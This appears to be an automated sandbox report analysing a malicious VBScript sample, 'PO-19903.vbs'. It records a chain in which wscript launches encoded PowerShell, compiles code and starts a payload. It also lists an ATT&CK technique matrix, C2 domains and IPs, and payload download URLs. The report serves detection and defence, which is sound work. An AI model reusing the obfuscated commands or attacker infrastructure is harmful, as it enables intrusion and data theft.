ABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08745AE4 CreateNamedPipeW,
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter
    1
    Registry Run Keys / Startup Folder
    112
    Process Injection
    1
    Masquerading
    OS Credential Dumping111
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium11
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting
    1
    DLL Side-Loading
    1
    Registry Run Keys / Startup Folder
    131
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Non-Standard Port
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell
    Logon Script (Windows)1
    DLL Side-Loading
    112
    Process Injection
    Security Account Manager131
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Ingress Tool Transfer
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer2
    Non-Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingData Transfer Size Limits213
    Application Layer Protocol
    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 625175 Sample: PO-19903.vbs Startdate: 12/05/2022 Architecture: WINDOWS Score: 100 43 vegproworld.com 2->43 45 toshiba1122.duckdns.org 2->45 47 5 other IPs or domains 2->47 51 Multi AV Scanner detection for domain / URL 2->51 53 Found malware configuration 2->53 55 Antivirus detection for URL or domain 2->55 57 5 other signatures 2->57 11 wscript.exe 2 2->11         started        signatures3 process4 signatures5 65 Wscript starts Powershell (via cmd or directly) 11->65 67 Very long command line found 11->67 69 Encrypted powershell cmdline option found 11->69 14 powershell.exe 25 11->14         started        process6 signatures7 71 Writes to foreign memory regions 14->71 73 Tries to detect Any.run 14->73 17 ieinstal.exe 8 8 14->17         started        21 csc.exe 3 14->21         started        24 conhost.exe 14->24         started        process8 dnsIp9 37 toshiba1122.ddns.net 197.210.226.45, 3360 VCG-ASNG Nigeria 17->37 39 toshiba1122.duckdns.org 194.5.98.59, 3360, 49741, 49743 DANILENKODE Netherlands 17->39 41 3 other IPs or domains 17->41 49 Tries to detect Any.run 17->49 26 wscript.exe 2 17->26         started        35 C:\Users\user\AppData\Local\...\ppgnlr3u.dll, PE32 21->35 dropped 29 cvtres.exe 1 21->29         started        file10 signatures11 process12 signatures13 59 Wscript starts Powershell (via cmd or directly) 26->59 61 Very long command line found 26->61 63 Encrypted powershell cmdline option found 26->63 31 powershell.exe 1 26->31         started        process14 process15 33 conhost.exe 31->33         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    PO-19903.vbs20%ReversingLabsScript.Trojan.Valyria
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    l-0004.l-dc-msedge.net0%VirustotalBrowse
    toshiba1122.duckdns.org2%VirustotalBrowse
    vegproworld.com5%VirustotalBrowse
    toshiba1122.ddns.net2%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
    https://go.micro0%Avira URL Cloudsafe
    https://vegproworld.com/:k0%Avira URL Cloudsafe
    https://contoso.com/0%Avira URL Cloudsafe
    https://vegproworld.com/rj-$0%Avira URL Cloudsafe
    https://contoso.com/License0%Avira URL Cloudsafe
    https://contoso.com/Icon0%Avira URL Cloudsafe
    https://vegproworld.com/wp-content/Touchb.vbs0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    l-0004.l-dc-msedge.net
    13.107.43.13
    truefalseunknown
    toshiba1122.duckdns.org
    194.5.98.59
    truetrueunknown
    vegproworld.com
    148.66.138.165
    truetrueunknown
    toshiba1122.ddns.net
    197.210.226.45
    truetrueunknown
    onedrive.live.com
    unknown
    unknownfalse
      high
      jgdbpa.am.files.1drv.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEAfalse
          high
          https://vegproworld.com/wp-content/Touchb.vbstrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Yieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://vegproworld.com/:kieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://vegproworld.com/rj-$ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://onedrive.live.com/ndowsieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
